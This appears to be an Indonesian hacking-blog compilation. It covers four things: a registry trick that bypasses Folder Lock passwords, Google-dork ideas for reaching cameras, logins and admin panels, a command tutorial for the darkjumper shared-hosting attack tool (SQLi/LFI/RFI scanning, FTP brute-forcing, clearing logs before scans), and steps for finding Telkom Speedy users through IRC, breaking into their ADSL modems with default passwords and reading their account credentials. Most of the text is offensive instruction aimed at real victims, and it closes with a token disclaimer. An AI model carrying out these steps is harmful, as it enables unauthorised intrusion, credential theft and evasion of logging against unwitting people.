Tadi gw dapet panggilan masuk dari seorang sahabat, setelah basa-basi dia nanya kabar ini dan itu ternyata intinya cuma satu, dia minta tolong cariin software pembobol Folder Lock buat buka data skripsinya yg udah dia Lock pake folder lock, soalnya dia lupa passwordnya.  gw jadi teringat tutorial jebol folder Lock yg pernah gw simpan di notebook gw. Sekalian Iseng2 berbagi ama temen2 di binushacker yg belum tau teknik ini, jadi mohon maaf klo postingan ini terlihat basi… wkwkwkw….(yg udah tau gak usah baca…)
To the POint:
1. Buka folder yg udah di proteksi ama Folder Lock dan coba masukin sembarang password
2. Biarin Folder Lock menunggu, buka regedit “hkey_local _machinesoftwarefolder lock, “bar code”
3. Ganti nama “bar code” menjadi “bar codet”
4. Sekarang kembali ke Folder Lock dan masukin password terserah apa aja
5. Lalu Klik “ok” dan mudah mudahan Folder Lock sudah bisa di Akses.

Semoga Bermanfaat, setidaknya sebagai bahan pengingat ilmu2 kita yg udah hilang….
Bravo Indonesian.

Google Hack File – My Uncle Google

Sebelum Anda mendownload file – file yang ter-attachment pastikan Anda memiliki pdf reader (adobe reder, foxit reader dsbnya)untuk membaca file yang ter-attachment. Jika Anda tidak memiliki silahkan download gratis di :

http://www.foxitsoftware.com/downloads/

http://www.adobe.com/products/acrobat/readstep2.html

= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =

Dalam File google hack berisi tentang barisan kode atau perintah yang mencakup 9 hal yaitu :

1. Online Cameras – Dengan string ini Anda bisa mengkontrol kamera keamanan pada sebuah jaringan terbuka.

2. View Blocked Sites – Hack ini mengijinkan Anda untuk melihat sebuah halaman website yang sengaja dibuang dari search engine agar tidak terakses sehingga halaman ini tidak bisa dicari oleh search engine.

3. Front Page user logins – Menggunakan String berikut Anda bisa menemukan file log in (user & password yang masih tersandikan) pada pengguna Microsoft FrontPage.

4. PHP Photo Albums – String algoritma pencari ini memungkinkan Anda untuk mengakses photo album yang berbasis PHP dan memasukan foto Anda ke album mereka.

5. VNC User Info – VNC adalah virtual computer controller yang mengijinkan Anda mengkontrol komputer Anda dari mana saja.

6. Network Printers – Dengan string ini, Anda bisa melihat printer yang telah di-share melalui public network, Anda juga bisa melihat status, setting dan beberapa file yang “mungkin” dapat Anda print.

7. PHP Admistrator Access – PHPMyAdmin adalah sebuah account dimana orang – orang dapat mengkontrol data mereka dan isi web mereka untuk ditampilkan dalam sebuah website yang mereka buat.

8. Download MP3/MPG/MPEG/MP4 dan multimedia lainnya – dengan menggunakan string berikut Anda bisa mendownload lagu, film, video clip dari sebuah situs yang memiliki celah yang dikarenakna tidak memiliki authentifikasi page.

9. Tampilan Halaman Google sesuai yang kita inginkan – Gunakan string berikut untuk merubah tampilan google susuai kebutuhan kita.

Darkjumper Versi 5 Oleh Gunslinger untuk Penetrasi Shared Hosting

Telah direlease darkjumper versi ke 5 oleh my brother gunslinger dengan pengembangan 2 dari darkjumper versi 4.
Fungsi – fungsi tool ini terfokus pada penetrasi terhadap suatu server shared hosting, antara lain:

1. User enumeration
2. Scan sqli, blind sqli, lfi dan rfi pada tiap web yang dihost di server yang sama
3. Scanning CGI dan struktur path umum web
4. Port Scan
5. Auto Dictionary Attack setelah user enumeration
6. Auto sql inject setelah ditemukan bug mysql injection (mencari panjang kolom otomatis)
7. Tambahan fungsi proksi
8. Tambahan Verbositas
9. Fitur ip dan geo checking

Perkembangan projek di sourceforge:
http://sourceforge.net/projects/darkjumper/

Ok berikut ini adalah tutorial dari gunslinger dalam bahasa Inggris tentang darkjumper versi 5.3 :
__________________________________________________ ______________________________________________

Nah setelah darkjumper v4.0 adalah batu oleh kakak saya, mywisdom.
Sekarang aku dan mywisdom dikembangkan v5.0 darkjumper (sekarang v5.3) dan menambahkan lebih banyak fungsi dalam darkjumper dengan ini, saya merilis alat ini dan beberapa tutorial bagaimana untuk menggunakan ini alat apa yang baru dalam versi ini…

Code:
Toolname     : darkjumper.py v5.3
    Developed by : mywisdom & gunslinger_ 
    Released on  : 15 ,February 2010
    Download url : https://sourceforge.net/projects/darkjumper/
 
Function(s)
1. User enumeration(s) guessing based on 4-8 chars trial taken from every site name that host at the same server
2. Scan for sql injection,local file inclusion,remote file inclusion and blind sql injection on every site(s) at the same server
3. CGI and Path(s) Scanning
4. Portscanning
5. Autobruteforcing after user enumeration
6. Autoinjector - autocolumnfinder (mysql) if found mysql bug if found
7. Proxy added
8. Verbocity added
9. IP or proxy checker and GeoIP usefull for checking your IP or your proxy work or not
 
    Additional feature: more fake http user agent(s)
Code:
Requirement(s): - python : 2.5.x
                          - perl

Sekarang kita pergi ke bagian tutorial: sebelum pemindaian: Pastikan Anda selalu clearlog sebelum pemindaian oleh menjalankan clearlog.py

Code:
./clearlog.py

orang-orang Allright, sekarang kami siap untuk mencoba menjalankan darkjumper dan menunjukkan pilihan oleh

Code:
./darkjumper.py -h

or

Code:
./darkjumper.py --help
dan kita punya seperti ini……..

dalam versi ini, kita memiliki 6 mode. ada: reverseonly | Hanya sebaliknya menargetkan permukaan bug tidak memeriksa | Memeriksa sqli dan buta sqli pada setiap web yang host pada server target yang sama penuh | Memeriksa sqli, buta, rfi, lfi pada setiap web yang host pada sama target server cgidirs | Pemindaian cgidirs pada server target enum [angka] | Menebak enumerasi pengguna pada server (4-8 karakter pengguna enumerasi) portscan [startport]-[endport] | Pemindaian terbuka port pada server target ok ada deskripsi apapun penuh pada itu.

..—————————————————————————————————
reverseonly dalam mode ini, darkjumper hanya reverse target ip. tidak memeriksa bug.
Perintah ini:
————————————————————————————————–

Code:
./darkjumper.py -t [target] -m reverseonly

Example :

-permukaan mode ini, darkjumper membalikkan target kemudian periksa sqli (sql injeksi kerentanan) dan buta (buta sql injeksi kerentanan) pada setiap web yang di-host pada server target yang sama yang bagus adalah dalam versi ini dan di atas, kami juga berusaha untuk finder kolom otomatis jika kita punya kesalahan jenis mysql! Fiuh!
Perintah ini:

Code:
./darkjumper.py -t [target] -m surface

example :

-penuh modus ini, darkjumper akan membalikkan target kemudian check CGI jalan dan memeriksa sqli (sql injeksi kerentanan), buta (buta sql injeksi kerentanan), lfi (file lokal dimasukkan), rfi (file jarak jauh inklusi) pada setiap web yang di-host pada server target yang sama. autoinjector atau autocolumn finder berupaya dalam mode ini jika kita punya kesalahan mysql.
Perintah ini:

Code:
./darkjumper.py -t [target] -m full
Example :

-cgidirs mode ini, darkjumper hanya memeriksa CGI jalan memeriksa pada target Anda

Command:
Code:
./darkjumper.py -t [target] -m cgidirs

Example :

-enum ini mode, darkjumper membalikkan target maka menebak enumerasi pengguna pada server (4-8 karakter pengguna enumerasi)
Command is :

Code:
./darkjumper.py -t [target] -m enum [number]

Example command :

Code:
./darkjumper.py -t [target] -m enum 4

Example :

Catatan: Anda dapat mengaktifkan autoftpbruteforcing oleh:

Code:
./darkjumper.py -t [target] -m enum [number] -a

(argumen – adalah untuk autoftpbruteforcing)

Example :

-portscan ini mode, darkjumper hanya memeriksa port terbuka pada target Anda
Command is :

Code:
./darkjumper.py -t [target] -m portscan [startport]-[endport]

Example command :

Code:
./darkjumper.py -t localhost -m portscan 15-22

Example :

Anda dapat membuatnya verbose oleh:

./darkjumper.py -t localhost -m portscan 15-22 -v

Dan Anda dapat memeriksa ip dan proxy Anda.
Jika Anda ingin memeriksa proxy Anda perintah Anda adalah

./darkjumper.py -p [proxyaddressort]

atau Anda ingin memeriksa alamat ip

./darkjumper.py -c

————————————————————————————————–

Anda ingin menghentikan pemindaian Anda? cukup ketik perintah ini killall-9 /usr/bin/python & /usr/bin/perl allright killall-9 guys yang itu! hopely Anda dapat menikmati!!
Jangan lupa untuk memeriksa versi terbaru atau laporan bug@ https://sourceforge.net/projects/darkjumper/

—————————————————-

Tambahan:

Tentang subscan.py dan subscan2.py

fungsinya setelah selesai dilakukan scanning full atau surface untuk scanning sqli dan blind pada sub page

misal setelah Anda scan dengan surface mode, ketikkan:

./subscan.py

untuk memeriksa bug sqli dan blind sqli di halaman sub yang difetch dari hasil scan selanjutnya

setlah selesai dilakukan scan sub anda bisa lanjut dengan scanning sub page berikutnya

./subscan2.py

sekian dan terima kasih untuk all jasakom crews dan members


Teknik Hacking Modem ADSL dan Account Speedy

Langkah Pertama
Buka aplikasi mIRC? pilih server Dalnet? dan koneksikan. Kemudian join di beberapa channel itu terserah anda, dalam hal ini gw mencari target di channel #balikpapan dan #samarinda. Sesudah anda join klik Dalnet Status, kemudian ketikkan perintah ?/who #nama channel? tanpa tanda petik. Maka akan timbul beberapa teks. Biasanya IP dari Telkom Speedy angka awalnya adalah 125.xxx.xxx.xxx, IP inilah yang akan menjadi target scanning. Lihat gambar dibawah ini.

Image

 

Langkah Kedua

Buka aplikasi Advanced Port Scanner v1.0 Beta 1, kemudian cari sebuah IP contoh 125.160.33.41 ini merupakan sebuah IP TelkomSpeedy. Tetapi bukan IP itu yang akan kita scanning melainkan mengambil range IP dari 125.160.33.1-125.160.33.255, jadi angka yang diambil hanya 125.160.33. bukan 125.160.33.41 dan range yang dipake dari 1-255. Lihat hasil dari scanning tersebut.

Image

 

Langkah Ketiga

Tes IP tersebut dengan menggunakan web browser, disini gw memakai Mozilla Firefox kemudian masukan IP tersebut. apabila timbul pop up login berarti modem ADSL tersebut bisa di remote dari luar. Selanjutnya berbekal kemampuan untuk menembus password dari modem sebaiknya anda mencari tutorial mengenai beberapa password default sebuah modem dengan merk-merk yang berbeda..

 

Image

 

 

Gambar diatas merupakan login dari modem PROLINK type H9200.

 

Image

 

Ini merupakan tampilan dari modem Prolink H920. Kemudian Pada kolom WAN Interfaces klik ppp-0 seperti yang terlihat pada gambar. Kemudian klik edit untuk melihat konfigurasi dari modem sekaligus untuk mencari account telkomspeedy.

Image

 

Maka kita akan melihat tampilan seperti dibawah ini:

 

Image

 

 

Untuk melihat password, cukup dengan klik kanan pada pop up diatas view page source. Kemudian cari kata passwd. Lihat hasil pada gambar berikut:

 

Image

 

 

Dari hasil diatas dapat dicoba di situs TelkomSpeedy untuk menguji account yang telah gw dapat. Accountnya adalah 161101201848@telkom.net dan passnya tetap saya hidden kan demi menjaga privacy yang punya account.

Image

 

Image

 

Semua ini merupakan pembelajaran mengenai dunia hacking, penulis tidak bertanggung jawab atas kerusakan yang terjadi akibat penyalahgunaan artikel ini.